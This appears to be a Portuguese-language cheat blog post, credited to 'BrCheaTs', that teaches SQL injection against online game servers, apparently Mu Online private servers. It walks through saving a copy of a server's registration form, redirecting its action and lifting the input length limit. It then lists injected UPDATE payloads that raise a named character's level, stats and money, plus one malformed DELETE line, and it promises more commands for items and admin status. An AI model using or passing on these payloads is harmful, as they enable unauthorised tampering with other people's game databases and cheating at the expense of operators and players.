Sql Injection
Isso é uma tecnica sql injection claro que não serve só pra mu! serve pra qualquer tipo de jogo online! que receba dados através de site e assim nos podemos enviar comandos para o banco de dado do server! Vocês ja ouvirão falar'' os hacker derrubarao tal server" " os hacker deletaram todas as acc" "os hacker mudaram a xp do server"" pois é essa é a tecnica!
1- Você vai no site do server, vai na pagina de cadastro e clica com o botao direito lah!
2- Você coloca mostrar codigo fonte, vai aparecer os codigos em html.
3- Você aperta ctr+f e escreve form e aprte buscar!
4- Você encontrara algo assim[Clique Aqui Para Ver a Imagem de Como Irar FICAR].
5- depois q vc axar vc minimisa e vai lah na pagina de cadastro novamente e naum escreve nada apenas pareta ok como vc fosse se cadastrar! aparecera uma pagina de erro.
6- nessa pagina de erro vc clica o botao direito e vai em propriedades e copia a url q vai aparecer.
7- + uq vc vai fazer com essa url? hehe vc volta ao codigo fonte e cola a url na parte de action.
8- vai ficar assim [Clique Aqui Para Ver a Imagem de Como Irar FICAR].
9- agora vc aperta ctr+f novamente e escreve maxlength e aperta buscar.
10- quando vc axar vai esta assim INPUT class=input03
maxLength=10 name=Member_Id>
11- vc muda esse 10 para 9999
12- prontu vc criou uma copia de uma pagina e a tormou de uma forma vuneravel pra q vc possa enviar os comando!
13- quando vc for salvar o arquivo vc salva ele como .html
14- prontu pagina criada + e agora?
--------------------------------------------------------------------------------------------------
' UPDATE Character Set cLevel = '349' WHERE (Name = 'Rush')--
' UPDATE Character Set Reset = 9 WHERE (Name = 'Rush')--
' UPDATE ' DELETE Character = 9 WHERE (Name = 'Rush')--
' UPDATE Character Set Dexterity = 5000 WHERE (Name = 'Rush')--
' UPDATE Character Set Energy = 25000 WHERE (Name = 'Rush')--
' UPDATE Character Set Strength = 5000 WHERE (Name = 'Rush')--
' UPDATE Character Set Vitalit= 5000 WHERE (Name = 'Rush')--
' UPDATE Character Set Vitality = 5000 WHERE (Name = 'Rush')--
' UPDATE Character Set Money = 1000000000000 WHERE (Name = 'rush')--
aqui estao os comando sql injection!
claru eu coloquei apenas os basico pq se naum vai ter negu derrubando server ae diretu hehe!
esses comandos serve para editar seu char na parte q tem rush vc coloca o nick do ser char lah no server!
agora tah explicado pq naum liberam o codigo fonte do global neh hehe!!
obs:essa tecnica fuciona melhor em sites php, num tem uns server com site igual o do global nesses principalmente!
em asp eh diferente naum da desse metodo!
depois eu posto novos comandos o dos itens, mudar de classe, mudar pra gm!!
Obs: O post não é inteiramente do BrCheaTs foi pego por um internalta da internet e enviado pra mim dono da BrCheaTs.
![[Clique Aqui Para Ver a Imagem de Como Irar FICAR]](http://i28.tinypic.com/33m0x1v.jpg){kind=link}
![[Clique Aqui Para Ver a Imagem de Como Irar FICAR]](http://i27.tinypic.com/30kvy1c.jpg){kind=link}
0 comentários:
Postar um comentário